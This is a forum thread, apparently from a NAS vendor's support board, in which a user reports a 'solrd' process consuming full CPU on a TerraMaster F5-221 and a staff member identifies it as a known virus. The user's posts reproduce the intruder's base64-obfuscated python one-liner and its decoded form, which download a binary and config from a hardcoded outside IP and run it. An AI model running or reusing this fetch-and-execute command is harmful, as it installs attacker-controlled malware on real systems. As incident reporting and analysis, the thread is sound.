SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13

CPU, memory, fan, process, services status, system log, tempreture
Locked
User avatar
fec
Posts: 5
Joined: 31 May 2021, 23:24

SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13

Post by fec »

Hello all,

I saw that this process "solrd" is taking all the CPU Resorces from my F5-221 NAS. I post it here so every one can see it.


root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13229 13144 99 Aug06 ? 147-14:52:16 ./solrd

The decode is this python script
"""
f=open("./solrd","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/starrail/cbt2zip/setup.exe").read())
f.close()
f=open("./config.json","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/TNAS.json").read())
f.close()
"""

So I guess someone got access to my NAS, using the TOS Web access and modify that configuration.
This is a seriuos security issue
User avatar
fec
Posts: 5
Joined: 31 May 2021, 23:24

Re: SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13

Post by fec »

root 4252 4249 0 2021 ? 00:02:42 php-fpm: pool TOS
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
User avatar
fec
Posts: 5
Joined: 31 May 2021, 23:24

Re: SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13

Post by fec »

Solrd_100_CPU.PNG
User avatar
TMtina
TerraMaster Team
Posts: 100
Joined: 01 Nov 2022, 18:00

Re: SOLRD Process using 100% CPE - F5-221 - TOS 4.2.13

Post by TMtina »

This seems to be dig virus, please refer to this link: viewtopic.php?f=71&t=2292&p=12383&hilit=pty10#p12383.
Locked